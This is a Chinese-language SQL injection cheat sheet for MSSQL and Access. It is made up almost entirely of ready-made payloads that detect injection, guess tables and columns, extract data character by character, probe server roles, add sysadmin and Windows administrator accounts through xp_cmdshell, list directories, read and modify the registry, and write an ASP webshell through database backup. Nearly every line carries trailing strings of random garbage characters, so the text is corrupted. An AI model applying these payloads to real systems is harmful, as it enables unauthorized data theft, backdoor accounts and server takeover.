1.判断是否有注入;and 1=1 ;and 1=2 �@EQ{lGpU3
2.初步判断是否是mssql ;and user>0 B[$e;h*Aw[
g
��(��~&�
3.注入参数是字符'and [查询条件] and ''=' <[q�)2 5RL
k�O4C^pl"v
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 4
qn�QF]�4
]u:�NE'0Xy
5.判断数据库系统 5u&jN�U5m_
mB\5bSFY`
;and (select count(*) from sysobjects)>0 mssql u,C��-U�!A
b&ADj8cK�C
;and (select count(*) from msysobjects)>0 access bI�H�2c��J
1{wy%|�H\
5�x�iYCOy
�y`�N1I���
6.猜数据库 ;and (select Count(*) from [数据库名])>0 `XD�$�1��>
q<1@��ut��
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �K,R�Ia0)�
�D,7! /u'�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 #8`�G&��S*
R�'F|�z{�8
9.(1)猜字段的ascii值(access) cr!I"kTg�D
QK72����F
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ���
A�=,�m
YP6�+o#==
(2)猜字段的ascii值(mssql) )KN�FS,�5�
R�6!3Y�/Q@
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 2@H�~�nw 0
$�OJ*K��ul
10.测试权限结构(mssql) ^,X+
n5q;m
HCP �B�e2�
/i]�Gg
\)
eI[z%�j[Y*
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
i"�b*U5k�
>?kt3.IQ!X
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- q�jWg�yhL�
^8 z�*�f&g
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- *)w�
��8fq
k�oUH�>J:�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- |h'ug�x1iY
M��Dl�C��U
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- i�CH�Z{<k
�#�*�~ (��
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- .1}u�0Ib�J
sC#Ixq'ls7
;and 1=(select IS_MEMBER('db_owner'));-- (d (��whlF
M�,9WF)p)V
0t9G��$2�3
�Fm@�G��U
11.添加mssql和系统的帐户 LR^b�?�.#>
IuT�TM�A�t
;exec master.dbo.sp_addlogin username;-- LvR�=uD���
;exec master.dbo.sp_password null,username,password;-- 55AG>j&41�
w#�o<qrpHf
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 0�
c�Qf_o
:9)�>�!+|'
;exec master.dbo.xp_cmdshell 'net user username password ��l�+#�`�
$F��o ,�$�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- iX�,Qh2(ig
�vEb~�QX0~
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ����*V�c}W
j�/W#=\x�z
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- f(3#528�8�
wCdUYgsPT"
:s4C�W�E�d
A*$vk�2VWw
12.(1)遍历目录 �wM|-�u/9+
?GFVV��->i
;create table dirs(paths varchar(100), id int) -wO`o���<
#��><.�z�Z
;insert dirs exec master.dbo.xp_dirtree 'c:\' �Ao,lEjN�I
{�!,+C��0�
;and (select top 1 paths from dirs)>0 ='mqfGR�i>
k'{�lo���_
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) h.c)+wz/%C
�_x:�K%1_[
=e4,)Wd9&�
��ve>8v�w2
(2)遍历目录 �Ar�\`OhR�
#3�qkG��)�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �{u!,TDt*�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �g'I�S�8@�
&r��_�:n t
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �5o�gbse"
�;e��WVc;H
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 a�B$�Y��5�
�2.���|�Y�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 *z�(.D\{%�
�h+�v�Kai�
dCc���*<�S
�
:��&Ul��
13.mssql中的存储过程 `T m�I�r�c
�Z�GS�=;jM
xp_regenumvalues 注册表根键, 子键 ��t!K|3>w
�tV<��A��u
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 t!PFosF�p�
1�e&`m~5K+
xp_regread 根键,子键,键值名 h[� t��OY
8`i�m4.~#%
;exec xp_regread No[>�1]ds�
d�+/d)c��u
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �a��mP�Q�U
u�pX/fL��c
xp_regwrite 根键,子键, 值名, 值类型, 值 Sd{>(YWx~�
SQEXC*0��8
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 =7$YB�C�uF
F[J�;u/�Z�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 7%o\O{,U��
����-��
�@
xp_regdeletevalue 根键,子键,值名 =EIsqk�^�*
Hiw�{1E:rW
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 NE/3a���U�
;ym�UMQ%;/
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 h'N�,oD�B)
�]o_ P�s|
]�A_)&`"Cb
��D �L$P��
14.mssql的backup创建webshell ."MBK�yg6�
]�qr�O"X�=
use model )�[/+j"F �
>0f5M�j�ug
create table cmd(str image); �n0EK�NM�O
-]N��/P{=L
insert into cmd(str) values (''); $���biCm$a
vuD �t�Ez
backup database model to disk='c:\l.asp'; ��r�R."_Z2
>���Scco�I
6 Iup��4sP
~DC�w
�[y
15.mssql内置函数 hmks\eb~��
\�l#�=p+x5
;and (select @@version)>0 获得Windows的版本号 }B"kJN�x�V
O-G4�^��V8
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �g�6�nB�u�
mvYr"6f�8
;and (select user_name())>0 爆当前系统的连接用户 }J:~}?^%n
.lqo>Ta
y�
;and (select db_name())>0 得到当前连接的数据库 r�JR"[TT�J
}mX;0�qO�
q7X�/"Df�x
>�Y�LwWU<X
16.简洁的webshell :��^�p�x1�
4�Jht{#IIG
use model B:M�sn�)C~
sf�x:j~bsL
create table cmd(str image); _<�xU"8b"5
xH*�OE��zN
insert into cmd(str) values (''); �Ff.�gR��x
/�\C9F��GS
backup database model to disk='g:\wwwtest\l.asp';
